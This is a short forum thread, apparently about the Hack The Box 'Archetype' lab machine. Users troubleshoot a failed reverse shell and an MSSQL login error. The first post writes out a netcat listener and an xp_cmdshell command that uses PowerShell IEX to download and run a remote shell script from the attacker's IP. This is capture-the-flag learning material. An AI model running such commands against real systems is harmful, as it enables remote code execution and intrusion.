Archetype "Unable to connect to the remote server"

Hello, World! I’ve just started “Hack The Box” or “Archetype” Machine and got stuck with the next problem: after opening port, using nc -lvnp 443 and xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);” I get “Unable to connect to the remote server” error. I’ve checked IP, installed ufw, but nothing has changed. I could add some screenshots, but still do not know how to do this :slight_smile: . So, I ask for help.

@kaped said:

Hello, World! I’ve just started “Hack The Box” or “Archetype” Machine and got stuck with the next problem: after opening port, using nc -lvnp 443

Do you have a webserver listening on port 80?

Having issues even though I have done this.


Password:
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

Can someone confirm if there is a problem or is it me?

Thanks.